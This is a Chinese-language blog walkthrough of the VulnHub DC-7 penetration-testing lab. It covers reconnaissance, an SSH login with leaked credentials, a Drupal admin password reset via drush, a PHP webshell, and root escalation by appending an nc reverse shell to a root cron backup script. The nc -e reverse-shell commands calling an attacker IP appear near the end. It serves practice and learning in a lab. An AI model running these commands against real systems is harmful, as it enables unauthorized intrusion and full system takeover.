vulnhub靶场之DC-7

一.环境搭建

1.靶场描述

DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
While this isn't an overly technical challenge, it isn't exactly easy.
While it's kind of a logical progression from an earlier DC release (I won't tell you which one), there are some new concepts involved, but you will need to figure those out for yourself. :-) If you need to resort to brute forcing or dictionary attacks, you probably won't succeed.
What you will need to do, is to think "outside" of the box.
Waaaaaay "outside" of the box. :-)
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
 
  

只有一个flag

2.靶场下载地址

https://www.vulnhub.com/entry/dc-7,356/
 
  

3.启动靶场环境

vulnhub靶场之DC-7_第1张图片

虚拟机开启之后界面如上,我们不知道ip,需要自己探活,网段知道:192.168.52.0/24

二.渗透靶场

1.目标

目标就是我们搭建的靶场,靶场IP为:192.168.52.0/24

2.信息收集

(1)寻找靶场真实ip

nmap -sP 192.168.52.0/24
 
  

arp-scan -l
 
  

vulnhub靶场之DC-7_第2张图片

我们知道靶场ip地址为192.168.52.129

(2)探端口及服务

nmap -A -V -P- 192.168.52.129
 
  

vulnhub靶场之DC-7_第3张图片

发现开放了80端口,存在web服务,Apache httpd 2.4.25 (Debian)
发现开放了22端口,OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
 
  

也可以使用masscan探活端口

masscan --rate=10000 --ports 0-65535 192.168.52.129
 
  

vulnhub靶场之DC-7_第4张图片

(3)web指纹识别

vulnhub靶场之DC-7_第5张图片

3.渗透测试

(1)访问web服务

http://192.168.52.129
 
  

vulnhub靶场之DC-7_第6张图片

我们通过wappalyzer发现cms是Drupal 8

(2)扫描web服务

1)棱洞3.0指纹识别
./EHole_linux_amd64 finger -u http://192.168.52.129
 
  

vulnhub靶场之DC-7_第7张图片

使用棱洞3.0指纹识别发现有Drupal

2)nikto扫描网站结构
nikto -h http://192.168.52.129
 
  

使用nikto工具扫描网站结构,发现robots.txt

(3)渗透测试

1)首先我们查看robots.txt

vulnhub靶场之DC-7_第8张图片

可以看到是一些登录页面

http://192.168.52.129/index.php/user/login
 
  

vulnhub靶场之DC-7_第9张图片

我们想的是暴力破解,但是题目提示我们不能暴力破解

vulnhub靶场之DC-7_第10张图片

那么这个办法就行不通,我们试试Drupal8漏洞

2)查看Drupal 8漏洞

我们使用kali进行搜索Drupal8

searchsploit Drupal 8
 
  

找了一些Drupal 8 的漏洞 但是好像都不符合。

我们查看题目提示,说到谷歌可以提供很大的帮助,那么我们使用谷歌进行搜索

3)google搜索

我们再次查看页面,可以看到@DC7USER,我们进行搜索

vulnhub靶场之DC-7_第11张图片

vulnhub靶场之DC-7_第12张图片

我们进行查看

vulnhub靶场之DC-7_第13张图片

我们在config.php里面发现是用户名和密码,而且靶场开启了22端口,我们进行ssh

vulnhub靶场之DC-7_第14张图片

4)ssh登录
ssh [email protected]
 
  

vulnhub靶场之DC-7_第15张图片

发现可以登录成功

我们查看里面的文件,发现有两个文件

ls
 
  

vulnhub靶场之DC-7_第16张图片

我们切换到backups文件夹当中,有两个加密的文件。

vulnhub靶场之DC-7_第17张图片

我们查看mbox文件,发现里面有一个定时任务 用root 运行/opt/scripts/backups.sh。

查看下权限什么的,发现www-data拥有执行和写的权限,我们当前权限没有写权限,看来没办法动手脚了。

但是如果我们获得了www-data的shell 那就可以写点东西进去,然后依靠计划任务,用root去运行,那么我们可以获得了root权限的shell了。

vulnhub靶场之DC-7_第18张图片

我们查看backups.sh

cat backups.sh
 
  

image-20240107150838393

vulnhub靶场之DC-7_第19张图片

可以看到命令是进入 cd /var/www/html/ 后执行drush。然后去百度看看 drush是干什么呢?

vulnhub靶场之DC-7_第20张图片

这里有写一些drush基本语法。

https://www.howtoing.com/a-beginner-s-guide-to-drush-the-drupal-shell

drush user-password admin --password="new_pass" 
#想要更改您的密码?就这么简单。
#记得执行命令前先切换到Drupal的目录下面。
cd /var/www/html/
#Drupal默认账户是admin,ms02423是我设置的密码
drush user-password admin --password="ms02423"
 
  

image-20240107151725547

这样就修改成功了,这里ssh登录就是为了修改后台密码

5)安装php模块

我们可以看到登录成功

vulnhub靶场之DC-7_第21张图片

进入到后台管理页面 然后就找写webshell的地方了

vulnhub靶场之DC-7_第22张图片

发现Content里面可以编辑文章,依次点击Manage ——> Content ——> Add content ——> Basic page功能,尝试添加php一句话,但发现Drupal 8后为了安全需要将php单独作为一个模块导入;

vulnhub靶场之DC-7_第23张图片

发现Extend里面可以安装新模块 试试可不可以安装php。

php 插件下载地址
https://ftp.drupal.org/files/projects/php-8.x-1.x-dev.tar.gz
 
  

vulnhub靶场之DC-7_第24张图片

不知道为什么我的靶场php安装不成功,试了好多次都没有成功,所以后面的内容就没有办法写了

我在网上找了一篇wp,链接地址为

https://blog.csdn.net/qq_34028816/article/details/124572886
 
  

后面的内容因为我没有环境所以直接复制粘贴(ip地址为博主的ip地址)

vulnhub靶场之DC-7_第25张图片

安装成功

点击Enable newly added modules激活模块

vulnhub靶场之DC-7_第26张图片

点击前面的三角将前几栏折回,找到PHP Filetr勾选

vulnhub靶场之DC-7_第27张图片

并且点击install

vulnhub靶场之DC-7_第28张图片

我们可以看到安装成功

vulnhub靶场之DC-7_第29张图片

6)写入一句话木马

我们写入一句话木马

vulnhub靶场之DC-7_第30张图片

vulnhub靶场之DC-7_第31张图片

我们连接蚁剑,可以看到连接成功

vulnhub靶场之DC-7_第32张图片

vulnhub靶场之DC-7_第33张图片

7)kali反弹shell

kali端先监听

nc -lvnp 4444
 
  

vulnhub靶场之DC-7_第34张图片

蚁剑终端

nc -e /bin/sh 192.168.1.11 4444
 
  

image-20240107215817962

我们可以看到监听成功

vulnhub靶场之DC-7_第35张图片

打开交互模式

python -c 'import pty;pty.spawn("/bin/bash")'
 
  

image-20240107215917778

8)提权

提权想到之前那个脚本

image-20240107215947890

有权限

kali再监听一个端口

nc -lvnp 6666
 
  

vulnhub靶场之DC-7_第36张图片

将反弹shell写入脚本

echo "nc -e /bin/bash 192.168.1.11 6666" >> /opt/scripts/backups.sh
 
  

vulnhub靶场之DC-7_第37张图片

然后再执行脚本

vulnhub靶场之DC-7_第38张图片

提权到root

vulnhub靶场之DC-7_第39张图片

三.相关资源

1.靶场下载地址

2.nmap

3.arp-scan

4.masscan

5.[ 常用工具篇 ] 渗透神器 whatweb 安装使用详解

6.[ 渗透工具篇 ] EHole(棱洞)3.0安装部署及详解(linux & win)

7.nikto工具的使用

8.[ 隧道技术 ] 反弹shell的集中常见方式(一)nc反弹shell

9.实现交互式shell的几种方式

10.ssh登录

11.蚁剑的使用

你可能感兴趣的:([,vulnhub靶机通关篇,],web安全)